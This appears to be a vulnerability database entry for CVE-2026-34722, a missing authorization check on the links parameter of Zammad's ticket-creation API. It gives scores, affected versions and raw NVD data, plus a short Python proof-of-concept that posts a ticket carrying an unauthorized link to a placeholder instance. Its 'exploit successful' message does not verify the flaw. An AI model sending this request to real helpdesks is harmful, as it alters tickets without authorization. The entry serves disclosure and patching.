Security Vulnerability Report
CVE-2026-34722 CVSS 4.3 MEDIUM

CVE-2026-34722

Published: 2026-04-08 19:25:22
Last Modified: 2026-04-17 15:14:07

Description

Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the endpoint used for ticket creation was missing an authorization check when the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Weakness: CWE-862 (Missing Authorization), per the raw JSON below.
Note: the CVSS 3.1 vector above is the primary (NVD) assessment and assumes low privileges (PR:L), which matches the low-privilege token used in the PoC. The secondary CVSS 4.0 assessment in the raw JSON below scores the issue 6.9 MEDIUM with PR:N, so the two assessments differ on whether authentication is required; treat the more conservative reading as the planning basis until verified.

Configurations (Affected Products)

cpe:2.3:a:zammad:zammad:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding 6.5.4, per the raw JSON below)
cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:* - VULNERABLE
Zammad < 7.0.1
Zammad < 6.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
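"""Proof-of-concept request for CVE-2026-34722 (Zammad ticket creation).

Posts a single ticket-creation request that carries the "links" parameter
and reports on the HTTP status code only. Per the advisory, the issue is
fixed in Zammad 7.0.1 and 6.5.4; instances at those versions (or later)
are expected to reject or ignore the unauthorized link.

Placeholders: ``target_url`` and the ``Authorization`` token must be
replaced before use.
"""
import requests

# Target URL (Zammad installation)
target_url = "http://target-zammad-instance.com/api/v1/tickets"

# Headers with low-privilege authentication token
headers = {
    "Authorization": "Token low_priv_user_token_here",
    "Content-Type": "application/json",
}

# Payload exploiting the missing authorization on 'links' parameter
payload = {
    "title": "Exploit Test Ticket",
    "group": "Users",
    "customer": "[email protected]",
    "article": {
        "subject": "Test Article",
        "body": "Testing the vulnerability.",
    },
    # Vulnerable parameter: Adding a link without proper authorization check
    "links": {
        "target": "http://malicious-site.com",
        "type": "child",
    },
}

# Seconds allowed for connect and read. The original call passed no timeout,
# so an unresponsive host would block the script indefinitely.
REQUEST_TIMEOUT = 15

try:
    response = requests.post(
        target_url,
        json=payload,
        headers=headers,
        timeout=REQUEST_TIMEOUT,
    )
    if response.status_code == 201:
        # NOTE(review): 201 only shows a ticket was created; nothing here
        # verifies that the "links" parameter was actually applied, so this
        # message is not by itself evidence of the missing authorization.
        print("[+] Exploit successful! Ticket created with unauthorized link.")
        print("Response:", response.json())
    else:
        # Any non-201 status (including an authorization error on a patched
        # instance) lands here; the raw body is echoed for manual inspection.
        print("[-] Request failed or patched.")
        print("Status Code:", response.status_code)
        print("Response:", response.text)
except Exception as e:
    # Best-effort reporting: network errors, timeouts and a non-JSON 201 body
    # are all reported here rather than crashing the script.
    print(f"Error: {e}")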

References

https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8 (Vendor Advisory, per the raw JSON below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34722", "sourceIdentifier": "[email protected]", "published": "2026-04-08T19:25:22.440", "lastModified": "2026-04-17T15:14:07.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the used endpoint for ticket creation was missing authorization if the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zammad:zammad:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.4", "matchCriteriaId": "5AC4AB35-4DD1-43F8-B481-27640E70CF8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zammad:zammad:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "830AF7C5-9441-4C80-935E-C53BDB097BB1"}]}]}], "references": [{"url": "https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}